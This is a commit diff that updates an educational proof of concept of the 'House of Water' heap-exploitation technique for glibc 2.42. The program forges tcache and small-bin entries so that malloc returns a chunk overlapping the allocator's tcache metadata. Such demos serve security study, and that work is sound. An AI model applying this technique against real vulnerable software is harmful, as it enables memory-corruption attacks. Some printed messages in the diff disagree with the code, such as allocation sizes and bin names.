make the bruteforce-less house_of_water work for 2.42

Kyle-Kyle · Kyle-Kyle · commit e41b820686f5 · 2026-03-20T19:44:15.000-07:00
diff --git a/glibc_2.42/house_of_water.c b/glibc_2.42/house_of_water.c
@@ -14,7 +14,7 @@
  * The technique starts by allocating the 'relative chunk' immediately after tcache metadata,
  * sharing the same ASLR-partially-controlled second nibble (which is 2) as the target fake chunk location.
  * 
- * Then it crafts fake tcache entries in the 0x320 & 0x330 bins using two other controlled chunks matching the 'relative chunk' size,
+ * Then it crafts fake tcache entries in the 0x310 & 0x320 bins using two other controlled chunks matching the 'relative chunk' size,
  * then frees all three chunks into the unsorted bin while keeping the 'relative chunk' centered.
  * A large allocation sorts them into the same small bin linked list.
  * 
@@ -43,6 +43,19 @@ int main(void) {
 	setbuf(stdout, NULL);
 	setbuf(stderr, NULL);
 
+	puts("\n");
+	puts("\t==============================");
+	puts("\t|           STEP 0           |");
+	puts("\t==============================");
+	puts("\n");
+
+	puts("Very important for glibc-2.42! Now the sizeof `tcache_perthread_struct` is 0x300\n");
+	puts("Without the following heap fengshui, this technique will require 4-bit brutefoce\n\n");
+
+	// this allocation will force the allocation of `tcache_perthread_struct` at offset 0x4f0, which is good for us
+	puts("Do malloc(0x480) to force the misalignment of `tcache_perthread_struct`\n");
+	malloc(0x4e0);
+
 
 	puts("\n");
 	puts("\t==============================");
@@ -86,7 +99,8 @@ int main(void) {
 	// Step 2: Fill up t-cache for 0x90 size class
 	
 	// This is just to make a pointer to the t-cache metadata for later.
-	void *metadata = (void *)((long)(relative_chunk) & ~(0xfff));
+	void *metadata = (void *)((long)(relative_chunk) & ~(0xfff)) + 0x490;
+	printf("metadata: %p\n", metadata);
 
 	// Make allocations to free such that we can exhaust the 0x90 t-cache
 	puts("Allocate 7 0x88 chunks needed to fill out the 0x90 t-cache at a later time");
@@ -112,13 +126,13 @@ int main(void) {
 	puts("\t==============================");
 	puts("\n");
 
-	// Step 3: Create a 0x320 and a 0x330 t-cache entry which overlaps small_start and small_end.
+	// Step 3: Create a 0x310 and a 0x320 t-cache entry which overlaps small_start and small_end.
 	// By doing this, we can blindly fake a FWD and BCK pointer in the t-cache metadata!
 		
 	puts("Here comes the trickiest part!\n");
 	
-	puts("We essentially want a pointer in the 0x320 t-cache metadata to act as a FWD\n");
-	puts("pointer and a pointer in the 0x330 t-cache to act as a BCK pointer.");
+	puts("We essentially want a pointer in the 0x310 t-cache metadata to act as a FWD\n");
+	puts("pointer and a pointer in the 0x320 t-cache to act as a BCK pointer.");
 	puts("We want it such that it points to the chunk header of our small bin entries,\n");
 	puts("and not at the chunk itself which is common for t-cache.\n");
 
@@ -130,12 +144,12 @@ int main(void) {
 	puts("");
 	
 	puts("small_start:");
-	printf("0x%016lx\t\t0x%016lx  0x%016lx  <-- tcachebins[0x330][0/1], unsortedbin[all][0]\n", (unsigned long)(small_start-0x10), *(long *)(small_start-0x10), *(long *)(small_start-0x8));
+	printf("0x%016lx\t\t0x%016lx  0x%016lx  <-- tcachebins[0x320][0/1], unsortedbin[all][0]\n", (unsigned long)(small_start-0x10), *(long *)(small_start-0x10), *(long *)(small_start-0x8));
 	dump_memory(small_start, 2);
 	puts("");
 
 	puts("small_end:");
-	printf("0x%016lx\t\t0x%016lx  0x%016lx  <-- tcachebins[0x320][0/1], unsortedbin[all][2]\n", (unsigned long)(small_end-0x10), *(long *)(small_end-0x10), *(long *)(small_end-0x8));
+	printf("0x%016lx\t\t0x%016lx  0x%016lx  <-- tcachebins[0x310][0/1], unsortedbin[all][2]\n", (unsigned long)(small_end-0x10), *(long *)(small_end-0x10), *(long *)(small_end-0x8));
 	dump_memory(small_end, 2);
 
 	puts("\n");
@@ -156,16 +170,16 @@ int main(void) {
 	puts("\n");
 
 	// Step 3 part 1:
-	puts("Write 0x331 above small_start to enable its free'ing into the 0x330 t-cache.");
-	printf("\t*%p-0x18 = 0x331\n", small_start);
-	*(long*)(small_start-0x18) = 0x331;
+	puts("Write 0x321 above small_start to enable its free'ing into the 0x320 t-cache.");
+	printf("\t*%p-0x18 = 0x321\n", small_start);
+	*(long*)(small_start-0x18) = 0x321;
 	puts("");
 
-	puts("This creates a 0x331 entry just above small_start, which looks like the following:");
+	puts("This creates a 0x321 entry just above small_start, which looks like the following:");
 	dump_memory(small_start-0x20, 3);
 	puts("");
 
-	printf("Free the faked 0x331 chunk @ %p\n", small_start-0x10);
+	printf("Free the faked 0x321 chunk @ %p\n", small_start-0x10);
 	free(small_start-0x10); // Create a fake FWD
 	puts("");
 	
@@ -175,7 +189,7 @@ int main(void) {
 	*(long*)(small_start-0x8) = 0x91;
 	puts("");
 
-	puts("Now, let's do the same for small_end except using a 0x321 faked chunk.");
+	puts("Now, let's do the same for small_end except using a 0x311 faked chunk.");
 	puts("");
 
 
@@ -185,16 +199,16 @@ int main(void) {
 	puts("\n");
 
 	// Step 3 part 2:
-	puts("Write 0x321 above small_end, such that it can be free'd into the 0x320 t-cache:");
-	printf("\t*%p-0x18 = 0x321\n", small_end);
-	*(long*)(small_end-0x18) = 0x321;
+	puts("Write 0x311 above small_end, such that it can be free'd into the 0x320 t-cache:");
+	printf("\t*%p-0x18 = 0x311\n", small_end);
+	*(long*)(small_end-0x18) = 0x311;
 	puts("");
 	
-	puts("This creates a 0x321 just above small_end, which looks like the following:");
+	puts("This creates a 0x311 just above small_end, which looks like the following:");
 	dump_memory(small_end-0x20, 3);
 	puts("");
 	
-	printf("Free the faked 0x321 chunk @ %p\n", small_end-0x10);
+	printf("Free the faked 0x311 chunk @ %p\n", small_end-0x10);
 	free(small_end-0x10); // Create a fake BCK
 	puts("");
 	
@@ -239,17 +253,17 @@ int main(void) {
 	puts("\t\tsmall_start <--> relative_chunk <--> small_end");
 	printf("\t\t%p <--> %p <--> %p\n", small_start-0x10, relative_chunk-0x10, small_end-0x10);
 	
-	printf("\t- 0x320 t-cache:\n");
-	printf("\t\t* 0x%lx\n", *(long*)(metadata+0x390));
-	printf("\t- 0x330 t-cache\n");
-	printf("\t\t* 0x%lx\n", *(long*)(metadata+0x398));
+	printf("\t- 0x310 t-cache:\n");
+	printf("\t\t* 0x%lx\n", *(long*)(metadata+0x310));
+	printf("\t- 0x320 t-cache\n");
+	printf("\t\t* 0x%lx\n", *(long*)(metadata+0x318));
 	puts("");
 
 	puts("The fake chunk in the t-cache will look like the following:");
 	dump_memory(metadata+0x370, 4);
 	puts("");
 
-	puts("We can now observe that the 0x330 t-cache points to small_start and 0x320 t-cache points to ");
+	puts("We can now observe that the 0x320 t-cache points to small_start and 0x310 t-cache points to ");
 	puts("small_end, which is what we need to fake a small-bin entry and hijack relative_chunk.");
 
 
@@ -269,13 +283,14 @@ int main(void) {
 
 	/* VULNERABILITY */
 	printf("\t- small_start:\n");
-	printf("\t\t*%p = %p\n", small_start, metadata+0x200);
-	*(unsigned long *)small_start = (unsigned long)(metadata+0x200);
+	void *metadata_page = (void*)((long)metadata & ~0xfff);
+	printf("\t\t*%p = %p\n", small_start, metadata_page+0x700);
+	*(unsigned long *)small_start = (unsigned long)(metadata_page+0x700);
 	puts("");
 
 	printf("\t- small_end:\n");
-	printf("\t\t*%p = %p\n", small_end, metadata+0x200);
-	*(unsigned long *)(small_end+0x8) = (unsigned long)(metadata+0x200);
+	printf("\t\t*%p = %p\n", small_end, metadata_page+0x700);
+	*(unsigned long *)(small_end+0x8) = (unsigned long)(metadata_page+0x700);
 	puts("");
 	/* VULNERABILITY */
 
@@ -284,8 +299,7 @@ int main(void) {
 
 	puts("\t- small bin:");
 	printf("\t\t small_start <--> metadata chunk <--> small_end\n");
-	printf("\t\t %p\t     %p      %p\n", small_start, metadata+0x200, small_end);
-
+	printf("\t\t %p\t     %p      %p\n", small_start, metadata+0x228, small_end);
 
 	puts("\n");
 	puts("\t==============================");
@@ -306,12 +320,14 @@ int main(void) {
 	_ = malloc(0x88);
 
 
+
+
 	// Next allocation *could* be our faked chunk!
 	void *meta_chunk = malloc(0x88);
 
 	printf("\t\tNew chunk\t @ %p\n", meta_chunk);
 	printf("\t\tt-cache metadata @ %p\n", metadata);
-	assert(meta_chunk == (metadata+0x210));
+	assert(meta_chunk == (metadata+0x280));
 
 	puts("");
 }
